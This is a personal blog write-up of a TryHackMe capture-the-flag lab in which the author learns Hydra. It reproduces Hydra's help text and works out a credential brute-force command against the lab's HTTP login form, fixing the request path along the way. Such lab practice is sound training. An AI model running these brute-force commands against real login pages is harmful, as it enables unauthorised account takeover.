TryHackMe — Advent of Cyber 2 — Day 3
Good morning all,
Going to try and catch up today on the last few days of this event. Work here has been busy and the internet spotty. Let’s take advantage of when it is working.
Day 3 looks like it will be simple enough with the use of bad/easy credentials. They are suggesting to use Burp for this and even have the write-up on how to do. Instead I want to struggle bus my way through learning Hydra again.
Anyhow lets get to it,
So reading through the guide on the room, I made two text documents: usernames and passwords with their suggestions.
When we navigate through Firefox, to the machine, we get this page
Now, since it essentially (I’m thinking) gives us the answer combination (3 usernames and 3 passwords) we could just guess, But again I’m here to learn.
So let’s figure out the Hydra syntax.
#hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmppHydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
And.. this is why you read up on the tool before just wingin’ it..
Found a tutorial online (https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/), I’m just going to follow along with it and paste my experience here.
So let’s begin with their tutorial and see if it get’s us there. Network tab and toss in a bogus login we can get the failure error message.
hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”So let’s build to what we need:
hydra -L usernames.txt -P passwords.txt 10.10.226.104 http-post-form "/:username=^USER^&password=^PASS^&Login=Login:username_incorrect"OK.. either I messed up the command or they are tricking me with a different username:password.
Well, I kind of cheated for the sake of my own learning. It is one of the username:password combinations. I just manually tested some combinations. Let’s go back and fix our command and see what we did wrong.
Decided to do a packet capture since I was hitting a wall just to take a look at the responses.
We are getting a 404 on every try.. Cannot POST /
Ok looking back at the form on the original login page. The submit button forwards to /login. Let’s fix the Hydra command again..
hydra -L usernames.txt -P passwords.txt 10.10.226.104 http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:username_incorrect"And… we have success
Well that was a trainwreck but we got in.
Below the where I cropped the screenshot is the flag, as usual you can do a little work as well. Best of luck
Until next time,
-3lduderino
